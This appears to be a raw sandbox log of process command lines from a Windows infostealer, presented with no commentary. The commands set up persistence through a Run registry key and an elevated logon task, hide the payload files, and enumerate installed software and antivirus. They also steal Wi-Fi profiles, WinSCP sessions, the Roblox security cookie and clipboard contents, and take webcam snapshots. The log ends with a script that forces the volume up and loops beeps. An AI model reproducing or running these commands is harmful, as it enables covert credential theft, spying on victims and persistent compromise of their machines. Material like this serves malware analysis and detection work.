C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=5076 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=5076 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupNBPdrq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupNBPdrq /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupNBPdrq /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupNBPdrq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe /f

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupNBPdrq /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsTherapy.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\r3naeRIDdQoK.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\cscript.exe

cscript C:\Users\Admin\AppData\Roaming\r3naeRIDdQoK.vbs

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\sTEixZrDta9V_temp.ps1""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {netsh wlan show profile}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe" -invalid youcam,cyberlink,google -frame 10 -outfile C:\Users\Admin\AppData\Local\Temp\DEybUpMWLn7J4ftWEJYI\System\cam.1528_Admin.jpg"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\sTEixZrDta9V_temp.ps1"

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard

C:\Windows\system32\netsh.exe

"C:\Windows\system32\netsh.exe" wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\Admin\AppData\Local\app.asar.unpacked\node_modules\take-cam\snapshot.exe" /T C:\Users\Admin\AppData\Local\Temp\DEybUpMWLn7J4ftWEJYI\System\cam.1528_Admin"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_NBPdrq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs\"""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Start_NBPdrq /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_NBPdrq.vbs

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -Command " Add-Type -TypeDefinition @' using System.Runtime.InteropServices; [Guid(\"5CDF2C82-841E-4546-9722-0CF74078229A\"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] interface IAudioEndpointVolume { int f(); int g(); int h(); int i(); int SetMasterVolumeLevelScalar(float fLevel, System.Guid pguidEventContext); int j(); int GetMasterVolumeLevelScalar(out float pfLevel); int k(); int l(); int m(); int n(); int SetMute([MarshalAs(UnmanagedType.Bool)] bool bMute, System.Guid pguidEventContext); int GetMute(out bool pbMute); } [Guid(\"D666063F-1587-4E43-81F1-B948E807363F\"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] interface IMMDevice { int Activate(ref System.Guid id, int clsCtx, int activationParams, out IAudioEndpointVolume aev); } [Guid(\"A95664D2-9614-4F35-A746-DE8DB63617E6\"), InterfaceType(ComInterfaceType.InterfaceIsIUnknown)] interface IMMDeviceEnumerator { int f(); int GetDefaultAudioEndpoint(int dataFlow, int role, out IMMDevice endpoint); } [ComImport, Guid(\"BCDE0395-E52F-467C-8E3D-C4579291692E\")] class MMDeviceEnumeratorComObject { } public class Audio { static IAudioEndpointVolume Vol() { var enumerator = new MMDeviceEnumeratorComObject() as IMMDeviceEnumerator; IMMDevice dev = null; Marshal.ThrowExceptionForHR(enumerator.GetDefaultAudioEndpoint(/*eRender*/ 0, /*eMultimedia*/ 1, out dev)); IAudioEndpointVolume epv = null; var epvid = typeof(IAudioEndpointVolume).GUID; Marshal.ThrowExceptionForHR(dev.Activate(ref epvid, /*CLSCTX_ALL*/ 23, 0, out epv)); return epv; } public static float Volume { get { float v = -1; Marshal.ThrowExceptionForHR(Vol().GetMasterVolumeLevelScalar(out v)); return v; } set { Marshal.ThrowExceptionForHR(Vol().SetMasterVolumeLevelScalar(value, System.Guid.Empty)); } } public static bool Mute { get { bool mute; Marshal.ThrowExceptionForHR(Vol().GetMute(out mute)); return mute; } set { Marshal.ThrowExceptionForHR(Vol().SetMute(value, System.Guid.Empty)); } } } '@ [audio]::Mute = $false [audio]::Volume = 1 Add-Type -AssemblyName System.speech $speak = New-Object System.Speech.Synthesis.SpeechSynthesizer $speak.Speak(\"Nova Sentinel On Top\") $sustain = 1; $pause = 1; while ($true) { [console]::beep(990,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1320,125*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,250*$sustain); [console]::beep(880,500*$sustain); [console]::beep(880,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,750*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,500*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1056,500*$sustain); [console]::beep(880,500*$sustain); [console]::beep(880,500*$sustain); sleep -milliseconds (250*$pause); [console]::beep(1188,500*$sustain); [console]::beep(1408,250*$sustain); [console]::beep(1760,500*$sustain); [console]::beep(1584,250*$sustain); [console]::beep(1408,250*$sustain); [console]::beep(1320,750*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,500*$sustain); [console]::beep(990,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,500*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1056,500*$sustain); [console]::beep(880,500*$sustain); [console]::beep(880,500*$sustain); sleep -milliseconds (500*$pause); [console]::beep(1320,500*$sustain); [console]::beep(990,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1320,125*$sustain); [console]::beep(1188,125*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,250*$sustain); [console]::beep(880,500*$sustain); [console]::beep(880,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1188,250*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(990,750*$sustain); [console]::beep(1056,250*$sustain); [console]::beep(1188,500*$sustain); [console]::beep(1320,500*$sustain); [console]::beep(1056,500*$sustain); 